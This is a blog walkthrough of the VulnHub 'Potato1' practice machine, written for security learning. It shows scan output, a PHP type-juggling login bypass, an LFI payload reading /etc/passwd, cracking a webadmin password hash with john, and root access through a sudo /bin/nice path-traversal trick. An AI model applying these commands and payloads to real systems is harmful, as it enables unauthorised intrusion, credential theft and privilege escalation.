Chinmay Patel
Chinmay's blog

Chinmay's blog

VulnHub - Potato1 - Walkthrough

VulnHub - Potato1 - Walkthrough

Chinmay Patel's photo
Chinmay Patel
·May 20, 2022·

6 min read


Difficulty: Easy to medium


This machine has PHP Type Juggling vulnerability which is used to bypass login form. Local File Inclusion (LFI) vulnerability is used to open a reverse shell on the machine. Privileges escalated by abusing misconfigured sudo permissions.



We start off by running an nmap scan:

└─$ sudo nmap -sC -sV -p- -oA nmap/AllPorts
Starting Nmap 7.92 ( ) at 2022-05-19 15:07 EDT
Nmap scan report for
Host is up (0.065s latency).
Not shown: 65532 closed tcp ports (reset)
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 ef:24:0e:ab:d2:b3:16:b4:4b:2e:27:c0:5f:48:79:8b (RSA)
|   256 f2:d8:35:3f:49:59:85:85:07:e6:a2:0e:65:7a:8c:4b (ECDSA)
|_  256 0b:23:89:c3:c0:26:d5:64:5e:93:b7:ba:f5:14:7f:3e (ED25519)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Potato company
|_http-server-header: Apache/2.4.41 (Ubuntu)
2112/tcp open  ftp     ProFTPD
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--   1 ftp      ftp           901 Aug  2  2020 index.php.bak
|_-rw-r--r--   1 ftp      ftp            54 Aug  2  2020 welcome.msg
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 62.41 seconds

From the nmap scan results we can see that ProFTPD is running on port 2112. We will start from there as Anonymous FTP login is allowed on the port.

Port 2112

After using anonymous:anonymous as login information, we found two files index.php.bak and welcome.msg on the server.

└─$ ftp 2112
Connected to
220 ProFTPD Server (Debian) [::ffff:]
Name ( anonymous
331 Anonymous login ok, send your complete email address as your password
230-Welcome, archive user anonymous@ !
230-The local time is: Thu May 19 19:25:16 2022
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||50419|)
150 Opening ASCII mode data connection for file list
-rw-r--r--   1 ftp      ftp           901 Aug  2  2020 index.php.bak
-rw-r--r--   1 ftp      ftp            54 Aug  2  2020 welcome.msg
226 Transfer complete

Port 80

Let’s navigate to port 80 through a web browser. By exploring IP in the URL box, it puts up following web page as shown in the below image.


After looking source code, we found nothing interesting there.


Next, run a gobuster scan with the wordlist /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt as follows:

└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:           
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
2022/05/19 15:02:40 Starting gobuster in directory enumeration mode
/admin                (Status: 301) [Size: 318] [-->]
/potato               (Status: 301) [Size: 319] [-->]
/server-status        (Status: 403) [Size: 280]                                     

2022/05/19 15:18:02 Finished

From this scan, directory /admin is discovered. We found login page to access admin panel after visiting Password attacks against login page was unsuccessful.


FTP Server

We started from downloading both files in our local machine for further inspection.

ftp> get index.php.bak
local: index.php.bak remote: index.php.bak
229 Entering Extended Passive Mode (|||6305|)
150 Opening BINARY mode data connection for index.php.bak (901 bytes)
   901        4.79 MiB/s 
226 Transfer complete
901 bytes received in 00:00 (31.20 KiB/s)
ftp> get welcome.msg
local: welcome.msg remote: welcome.msg
229 Entering Extended Passive Mode (|||18053|)
150 Opening BINARY mode data connection for welcome.msg (54 bytes)
    54        1.25 MiB/s 
226 Transfer complete
54 bytes received in 00:00 (1.04 KiB/s)
ftp> bye
221 Goodbye.

There was nothing interesting on welcome.msg file. But index.php.bak contains php code for login functionality.

PHP Type Juggling

PHP snippet for login function from file index.php.bak.


$pass= "potato"; //note Change this password regularly

  if (strcmp($_POST['username'], "admin") == 0  && strcmp($_POST['password'], $pass) == 0) {
    echo "Welcome! </br> Go to the <a href=\"dashboard.php\">dashboard</a>";
    setcookie('pass', $pass, time() + 365*24*3600);
    echo "<p>Bad login/password! </br> Return to the <a href=\"index.php\">login page</a> <p>";

We tried to use default password ($pass= "potato";) found in the file, but it has been changed. In source code strcmp function is used to compare the username admin and password from $pass.

After searching this scenario on google, we found an interesting post PHP Magic Tricks: Type Juggling


After understanding this, we used Burp Suite to intercept the login request and change the password parameter to an empty array.


After successful login we redirected to admin dashboard with following message on screen.

Go to the dashboard

Local File Inclusion Vulnerability

After spending some time on Admin dashboard, logs page caught our eyes. This page was using POST request with file parameter to get log files (log_01.txt, log_02.txt, log_03.txt) from server.


We can change file parameter value to file=../../../../../../etc/passwd which confirmed that file parameter is vulnerable to LFI.



We saved the password hash we found for webadmin user in a text file and used john to crack the password.

└─$ cat hash.txt 

└─$ john hash.txt 
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 30 candidates buffered for the current salt, minimum 48 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
dragon           (webadmin)     
1g 0:00:00:00 DONE 2/3 (2022-05-19 17:19) 20.00g/s 21960p/s 21960c/s 21960C/s 123456..knight
Use the "--show" option to display all of the cracked passwords reliably
Session completed.


We can use the username password pair webadmin:dragon to SSH into the target:

└─$ ssh webadmin@ 
The authenticity of host ' (' can't be established.
webadmin@'s password: 
webadmin@serv:~$ id
uid=1001(webadmin) gid=1001(webadmin) groups=1001(webadmin)

Privilege Escalation

We started from looking for sudo permissions first.

webadmin@serv:~$ sudo -l
[sudo] password for webadmin: 
Matching Defaults entries for webadmin on serv:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User webadmin may run the following commands on serv:
    (ALL : ALL) /bin/nice /notes/*

This means we can run any files under /notes directory using sudo permission through /bin/nice.

Unfortunately we don't have permission to read or write to /notes directory.

webadmin@serv:~$ ls -al /notes
total 16
drwxr-xr-x  2 root root 4096 Aug  2  2020 .
drwxr-xr-x 21 root root 4096 Sep 28  2020 ..
-rwx------  1 root root   11 Aug  2  2020
-rwx------  1 root root    8 Aug  2  2020

We can use directory traversal technique to bypass this restriction. To do that we created shell script under home directory.

webadmin@serv:~$ pwd
webadmin@serv:~$ echo "/bin/bash" >>
webadmin@serv:~$ chmod +x
webadmin@serv:~$ cat 

Now we can use /bin/nice to escalate our privilege to root.

webadmin@serv:~$ sudo /bin/nice /notes/../home/webadmin/
[sudo] password for webadmin: 
root@serv:/home/webadmin# whoami
root@serv:/home/webadmin# id
uid=0(root) gid=0(root) groups=0(root)


root@serv:~# hostname && whoami && cat proof.txt && ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:50:56:bf:c5:01 brd ff:ff:ff:ff:ff:ff
    inet brd scope global ens192
       valid_lft forever preferred_lft forever
Share this